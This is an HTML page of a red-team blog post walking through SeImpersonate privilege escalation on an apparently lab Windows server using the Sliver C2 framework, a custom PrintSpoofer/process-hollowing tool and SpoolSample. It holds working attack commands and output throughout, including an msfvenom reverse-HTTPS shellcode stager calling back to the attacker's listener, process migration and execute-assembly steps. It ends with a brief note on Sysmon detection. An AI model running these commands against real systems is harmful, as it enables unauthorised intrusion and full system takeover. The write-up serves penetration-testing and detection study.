<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>2.a Privilege Escalation - Printspoofer | Red Mercury</title>
  <meta name="author" content="Mostafa Noureldin">
  
  <meta name="description" content="IntroductionThis post is built on what we have acheieved on our last post 1. Gaining Initial Foothold.
We will be able to spoof a printer named pipe to escalate our privileges to system user.
MigrationAfter gaining the intial access on the target, we had to migrate to some stable proccess other than our W3wp.exe one, this should be done by selecting an appropriate process from the target I cooshed explorer.exe.
We can create a new explorer.exe process then we can list the processes to get the newly created process id to use it in the migration.
123456789101112131415161718192021222324252627sliver (NORTHERN_CONCRETE) &amp;gt; execute explorer.exe[*] Command executed successfullysliver (NORTHERN_CONCRETE) &amp;gt; ps Pid    Ppid   Owner                        Arch     Executable          Session ====== ====== ============================ ======== =================== ========= 0      0                                            [System Process]    -1       4      0                                            System              -1       68     4                                            Registry            -1       496    4                                            smss.exe            -1       604    596                                          csrss.exe           -1       704    696                                          csrss.exe           -1            4260   800                                          NisSrv.exe          -1       3796   2580   IIS APPPOOL\DefaultAppPool   x86_64   w3wp.exe            0        1072   800                                          winlogbeat.exe      -1       4820   800                                          WmiApSrv.exe        -1       1004   800                                          svchost.exe         -1       1168   800                                          svchost.exe         -1       3592   800                                          svchost.exe         -1       3356   3796   IIS APPPOOL\DefaultAppPool   x86_64   explorer.exe        0       ⚠️  Security Product(s): Sysmon64, Windows Defender"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="2.a Privilege Escalation - Printspoofer"/>
  <meta property="og:site_name" content="Red Mercury"/>

  
    <meta property="og:image" content=""/>
  

  
  
  
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="https://mmnoureldin.github.io/Red-Team/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="https://mmnoureldin.github.io/Red-Team/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-70812759-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-70812759-1');
</script>






<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="https://mmnoureldin.github.io/Red-Team/">Red Mercury</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="https://mmnoureldin.github.io/Red-Team/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="https://mmnoureldin.github.io/Red-Team/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="https://mmnoureldin.github.io/Red-Team/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="https://mmnoureldin.github.io/Red-Team/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 2.a Privilege Escalation - Printspoofer</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>This post is built on what we have acheieved on our last post <a href="https://mmnoureldin.github.io/Red-Team/2023/02/13/Gaining-Initial-Foothold/" title="1. Gaining Initial Foothold">1. Gaining Initial Foothold</a>.</p>
<p>We will be able to spoof a printer named pipe to escalate our privileges to system user.</p>
<h2 id="Migration"><a href="#Migration" class="headerlink" title="Migration"></a>Migration</h2><p>After gaining the intial access on the target, we had to migrate to some stable proccess other than our <code>W3wp.exe</code> one, this should be done by selecting an appropriate process from the target I cooshed <code>explorer.exe</code>.</p>
<p>We can create a new explorer.exe process then we can list the processes to get the newly created process id to use it in the migration.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; execute explorer.exe</span><br><span class="line"></span><br><span class="line">[*] Command executed successfully</span><br><span class="line"></span><br><span class="line">sliver (NORTHERN_CONCRETE) &gt; ps</span><br><span class="line"></span><br><span class="line"> Pid    Ppid   Owner                        Arch     Executable          Session </span><br><span class="line">====== ====== ============================ ======== =================== =========</span><br><span class="line"> 0      0                                            [System Process]    -1      </span><br><span class="line"> 4      0                                            System              -1      </span><br><span class="line"> 68     4                                            Registry            -1      </span><br><span class="line"> 496    4                                            smss.exe            -1      </span><br><span class="line"> 604    596                                          csrss.exe           -1      </span><br><span class="line"> 704    696                                          csrss.exe           -1      </span><br><span class="line">     </span><br><span class="line"> 4260   800                                          NisSrv.exe          -1      </span><br><span class="line"> 3796   2580   IIS APPPOOL\DefaultAppPool   x86_64   w3wp.exe            0       </span><br><span class="line"> 1072   800                                          winlogbeat.exe      -1      </span><br><span class="line"> 4820   800                                          WmiApSrv.exe        -1      </span><br><span class="line"> 1004   800                                          svchost.exe         -1      </span><br><span class="line"> 1168   800                                          svchost.exe         -1      </span><br><span class="line"> 3592   800                                          svchost.exe         -1      </span><br><span class="line"> 3356   3796   IIS APPPOOL\DefaultAppPool   x86_64   explorer.exe        0       </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">⚠️  Security Product(s): Sysmon64, Windows Defender</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<span id="more"></span>

<p>Then, we had to migrate to the newly created process.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; migrate 3356</span><br><span class="line"></span><br><span class="line">[*] Successfully migrated to 3356</span><br><span class="line"></span><br><span class="line">sliver (NORTHERN_CONCRETE) &gt; </span><br><span class="line">[*] Session 9ff22506 NORTHERN_CONCRETE - tcp([::1]:57616)-&gt;192.168.24.22 (castelblack) - windows/amd64 - Thu, 23 Feb 2023 16:47:46 EST</span><br></pre></td></tr></table></figure>

<h2 id="Situational-Awareness"><a href="#Situational-Awareness" class="headerlink" title="Situational Awareness"></a>Situational Awareness</h2><p>After gaining access to the target as user <code>IIS APPPOOL\DefaultAppPool</code>, we had to check our privileges by issuing a <code>whoami</code> command.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; sa-whoami </span><br><span class="line"></span><br><span class="line">[*] Successfully executed sa-whoami (coff-loader)</span><br><span class="line">[*] Got output:</span><br><span class="line"></span><br><span class="line">UserName		SID</span><br><span class="line">====================== ====================================</span><br><span class="line">IIS APPPOOL\DefaultAppPool	S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">GROUP INFORMATION                                 Type                     SID                                          Attributes               </span><br><span class="line">================================================= ===================== ============================================= ==================================================</span><br><span class="line">Mandatory Label\High Mandatory Level              Label                    S-1-16-12288                                  Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">BUILTIN\Users                                     Alias                    S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">NT AUTHORITY\SERVICE                              Well-known group         S-1-5-6                                       Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">CONSOLE LOGON                                     Well-known group         S-1-2-1                                       Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">NT AUTHORITY\This Organization                    Well-known group         S-1-5-15                                      Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">BUILTIN\IIS_IUSRS                                 Alias                    S-1-5-32-568                                  Mandatory group, Enabled by default, Enabled group, </span><br><span class="line">LOCAL                                             Well-known group         S-1-2-0                                       Mandatory group, Enabled by default, Enabled group, </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Privilege Name                Description                                       State                         </span><br><span class="line">============================= ================================================= ===========================</span><br><span class="line">SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled                      </span><br><span class="line">SeIncreaseQuotaPrivilege      Adjust memory quotas for a process                Disabled                      </span><br><span class="line">SeAuditPrivilege              Generate security audits                          Disabled                      </span><br><span class="line">SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled                       </span><br><span class="line">SeImpersonatePrivilege        Impersonate a client after authentication         Enabled                       </span><br><span class="line">SeCreateGlobalPrivilege       Create global objects                             Enabled                       </span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled</span><br></pre></td></tr></table></figure>

<p>It can be seen that our user has <code>SeImpersonatePrivilege</code>, so let’s try the print spoofer exploit.</p>
<h2 id="Exploitation"><a href="#Exploitation" class="headerlink" title="Exploitation"></a>Exploitation</h2><p>I have made an exploit that combined print spoofer and process hollowing to be executed in memory through one file <a href="https://github.com/mmnoureldin/PrintSpoofSecure" title="" target="">PrintSpoofSecure</a> .</p>
<p>A valid shellcode stager is need here, so let’s get one using Metasploit.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ msfvenom -p windows/x64/custom/reverse_winhttps LHOST=192.168.24.138 LPORT=443 LURI=/hello.woff exitfunc=thread -f csharp | <span class="built_in">tr</span> -d <span class="string">&quot;\n&quot;</span></span><br></pre></td></tr></table></figure>

<p>After combining the shellcode and the our printspoofer, we had to compile them and run the outcome binary in memory as in below snippet.</p>
<p>Before running any furthure exploits, we had to adjust our handler. We will kill the initial handler and run another one for the metasploit shellcode handler.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; jobs </span><br><span class="line"></span><br><span class="line"> ID   Name    Protocol   Port </span><br><span class="line">==== ======= ========== ======</span><br><span class="line"> 1    https   tcp        8443 </span><br><span class="line"> 2    https   tcp        443  </span><br><span class="line"></span><br><span class="line">sliver (NORTHERN_CONCRETE) &gt; jobs -k 1</span><br><span class="line"></span><br><span class="line">[*] Killing job #1 ...</span><br><span class="line">[*] Successfully killed job #1</span><br><span class="line"></span><br><span class="line">[!] Job #1 stopped (tcp/https)</span><br><span class="line"></span><br><span class="line">[!] Job #1 stopped (tcp/https)</span><br><span class="line"></span><br><span class="line">sliver (NORTHERN_CONCRETE) &gt; stage-listener --url https://192.168.24.128:8443 --profile win64 --prepend-size</span><br><span class="line"></span><br><span class="line">[*] No builds found for profile win64, generating a new one</span><br><span class="line">[*] Job 3 (https) started</span><br><span class="line"></span><br><span class="line">sliver (NORTHERN_CONCRETE) &gt; jobs </span><br><span class="line"></span><br><span class="line"> ID   Name    Protocol   Port </span><br><span class="line">==== ======= ========== ======</span><br><span class="line"> 2    https   tcp        443  </span><br><span class="line"> 3    https   tcp        8443</span><br></pre></td></tr></table></figure>

<p>Now, we will run the printspoofer to create our malicious pipe.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; execute-assembly -i -M -E /home/kali/Documents/PrintSpoofSecure.exe &quot;\\test\\pipe\\spoolss&quot;</span><br></pre></td></tr></table></figure>

<p>As there are no results returned from our command, we can check the created pipes by lisiting them as.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; ls &quot;\\\\.\\pipe\\&quot;</span><br><span class="line"></span><br><span class="line">\\.\pipe\ (28 items, 66 B)</span><br><span class="line">==========================</span><br><span class="line">-rw-rw-rw-  atsvc                                                   3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Ctx_WinStation_API_service                              3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  epmapper                                                3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  eventlog                                                3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  InitShutdown                                            3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  lsass                                                   4 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  LSM_API_service                                         3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  ntsvcs                                                  3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER                  1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  PSHost.133215890693195793.292.DefaultAppDomain.conhost  1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  ROUTER                                                  3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  scerpc                                                  3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  SessEnvPublicRpc                                        3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  spoolss                                                 3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  srvsvc                                                  5 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  TermSrv_API_service                                     3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  test\pipe\spoolss                                       1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  trkwks                                                  3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  vgauth-service                                          1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  W32TIME_ALT                                             3 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-220-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-268-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-2d8-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-348-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-358-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-47c-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  Winsock2\CatalogChangeListener-52c-0                    1 B  Fri Jul 22 00:34:33 +0100 2185</span><br><span class="line">-rw-rw-rw-  wkssvc                                                  4 B  Fri Jul 22 00:34:33 +0100 2185</span><br></pre></td></tr></table></figure>

<p>Our spoofed pipe is created as <code>test\pipe\spoolss</code>. Now it is the time for running the sppolsample assembly to induce the spool service to connect to our pipe where we can impersonate it’s user.</p>
<p>I just used <a href="https://github.com/leechristensen/SpoolSample" title="" target="">SpoolSample</a>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; execute-assembly  -M -E /home/kali/Documents/SpoolSample.exe castelblack &quot;castelblack/pipe/test&quot;</span><br><span class="line"></span><br><span class="line">[*] Output:</span><br><span class="line">Waiting for connection on namedpipe: \\.\pipe\test\pipe\spoolss</span><br><span class="line">ImpersonateNamedPipeClient: True</span><br><span class="line">OpenThreadToken: True</span><br><span class="line">Impersonated user is: NT AUTHORITY\SYSTEM.</span><br><span class="line">Got process information and located PEB address of process at 0x3c6d688010. Success: True.</span><br><span class="line">DEBUG: Executable base address: 0x7ff604c10000.</span><br><span class="line">DEBUG: e_lfanew offset: 0xe8.</span><br><span class="line">DEBUG: RVA offset: 0x110.</span><br><span class="line">DEBUG: RVA value: 0x4510.</span><br><span class="line">Got executable entrypoint address: 0x7ff604c14510.</span><br><span class="line">Overwrote entrypoint with payload. Success: True.</span><br><span class="line">Triggered payload. Success: True. Check your listener!</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[*] Session af1ee5d4 LARGE_SHOE - tcp([::1]:57270)-&gt;192.168.24.22 (castelblack) - windows/amd64 - Wed, 22 Feb 2023 20:00:29 EST</span><br></pre></td></tr></table></figure>

<p>Soon after that we should receive a new session as system user, let’s duplicate this session to get a redundant one, this can be acheievd by running <code>getsystem</code>.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">sliver (NORTHERN_CONCRETE) &gt; sessions </span><br><span class="line"></span><br><span class="line"> ID         Name             Transport   Remote Address                    Hostname      Username                     Operating System   Locale   Last Message                                Health  </span><br><span class="line">========== ================ =========== ================================= ============= ============================ ================== ======== =========================================== ========= </span><br><span class="line"> af1ee5d4   LARGE_SHOE       http(s)     tcp([::1]:57270)-&gt;192.168.24.22   castelblack   NT AUTHORITY\SYSTEM          windows/amd64      en-US    Wed Feb 22 20:00:46 EST 2023 (3s ago)       [ALIVE] </span><br><span class="line"> 6d5739e4   NORTHERN_CONCRETE   http(s)     tcp([::1]:39004)-&gt;192.168.24.22   castelblack   IIS APPPOOL\DefaultAppPool   windows/amd64      en-US    Wed Feb 22 20:00:46 EST 2023 (3s ago)       [ALIVE] </span><br><span class="line"></span><br><span class="line">sliver (NORTHERN_CONCRETE) &gt; use af1ee5d4-e9bc-4d71-8cfb-4a5b3092319b</span><br><span class="line"></span><br><span class="line">[*] Active session LARGE_SHOE (af1ee5d4-e9bc-4d71-8cfb-4a5b3092319b)</span><br><span class="line"></span><br><span class="line">sliver (LARGE_SHOE) &gt; getsystem </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[*] A new SYSTEM session should pop soon...</span><br><span class="line"></span><br><span class="line">[*] Session d082cc38 LARGE_SHOE - tcp([::1]:40872)-&gt;192.168.24.22 (castelblack) - windows/amd64 - Wed, 22 Feb 2023 20:02:00 EST</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>From the current system session, we check session details and verify the username.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">sliver (LARGE_SHOE) &gt; info</span><br><span class="line"></span><br><span class="line">        Session ID: af1ee5d4-e9bc-4d71-8cfb-4a5b3092319b</span><br><span class="line">              Name: LARGE_SHOE</span><br><span class="line">          Hostname: castelblack</span><br><span class="line">              UUID: 15254d56-94dd-cb7a-7637-ca4b44270e75</span><br><span class="line">          Username: NT AUTHORITY\SYSTEM</span><br><span class="line">               UID: S-1-5-18</span><br><span class="line">               GID: S-1-5-18</span><br><span class="line">               PID: 616</span><br><span class="line">                OS: windows</span><br><span class="line">           Version: Server 2016 build 17763 x86_64</span><br><span class="line">            Locale: en-US</span><br><span class="line">              Arch: amd64</span><br><span class="line">         Active C2: https://192.168.24.138</span><br><span class="line">    Remote Address: tcp([::1]:49618)-&gt;192.168.24.22</span><br><span class="line">         Proxy URL: </span><br><span class="line">Reconnect Interval: 1m0s</span><br><span class="line">     First Contact: Wed Feb 22 20:07:05 EST 2023 (2m13s ago)</span><br><span class="line">      Last Checkin: Wed Feb 22 20:09:12 EST 2023 (6s ago)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Observation"><a href="#Observation" class="headerlink" title="Observation"></a>Observation</h2><p>Mainly we are looking for events that relates to process injection and process creation.</p>
<img src="https://mmnoureldin.github.io/Red-Team/2023/02/24/Privilege-Escalation-Printspoofer/image-20230224025109340.png" class="">

<p>It can be seen that the <code>w3wp.exe</code> process created notepad.exe as remote injection target, then a <code>CreateRemoteThread</code> API was called to inject shellcode in it. These notepad events should be results of <code>execute-assembly</code> command which injected into remote processes in our case.</p>

	  <div class="article-footer-copyright">

</div>

	</div>

	
	
	<div>
  	<center>

	<div class="pagination">

    
    
    <a href="https://mmnoureldin.github.io/Red-Team/2023/03/08/Privilege-Escalation-KRBRelayup/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> Prev</a>
    

    <a href="https://mmnoureldin.github.io/Red-Team/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="https://mmnoureldin.github.io/Red-Team/2023/02/13/Gaining-Initial-Foothold/" type="button" class="btn btn-default ">Next<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


    </center>
	</div>
	
	<!-- comment -->
	<!--
<section id="comment">
    <h2 class="title">Comments</h2>

    
</section>

-->
	
	
	
	</div> <!-- col-md-9/col-md-12 -->


	
	<div id="side_meta">
		<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2023-02-24 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="https://mmnoureldin.github.io/Red-Team/categories/red-team/">red team<span>5</span></a></li> <li><a href="https://mmnoureldin.github.io/Red-Team/categories/red-team/privilege-escalation/">privilege escalation<span>2</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="https://mmnoureldin.github.io/Red-Team/tags/T1055/">T1055<span>2</span></a></li> <li><a href="https://mmnoureldin.github.io/Red-Team/tags/Print-Spoofer/">Print Spoofer<span>1</span></a></li> <li><a href="https://mmnoureldin.github.io/Red-Team/tags/Spool-sample/">Spool sample<span>1</span></a></li> <li><a href="https://mmnoureldin.github.io/Red-Team/tags/T1134/">T1134<span>1</span></a></li> <li><a href="https://mmnoureldin.github.io/Red-Team/tags/T1003-001/">T1003.001<span>2</span></a></li> <li><a href="https://mmnoureldin.github.io/Red-Team/tags/named-pipe/">named pipe<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Introduction"><span class="toc-article-text">Introduction</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Migration"><span class="toc-article-text">Migration</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Situational-Awareness"><span class="toc-article-text">Situational Awareness</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Exploitation"><span class="toc-article-text">Exploitation</span></a></li><li class="toc-article-item toc-article-level-2"><a class="toc-article-link" href="#Observation"><span class="toc-article-text">Observation</span></a></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->

		

	</div>
	
		

</div><!-- row -->

<!--
 -->



	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
  &copy; 2023 Mostafa Noureldin's Blog
  
       
</p>
 </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="https://mmnoureldin.github.io/Red-Team/js/jquery.imagesloaded.min.js"></script>
<script src="https://mmnoureldin.github.io/Red-Team/js/gallery.js"></script>
<script src="https://mmnoureldin.github.io/Red-Team/js/bootstrap.min.js"></script>
<script src="https://mmnoureldin.github.io/Red-Team/js/main.js"></script>
<script src="https://mmnoureldin.github.io/Red-Team/js/search.js"></script> 




</body>
   </html>
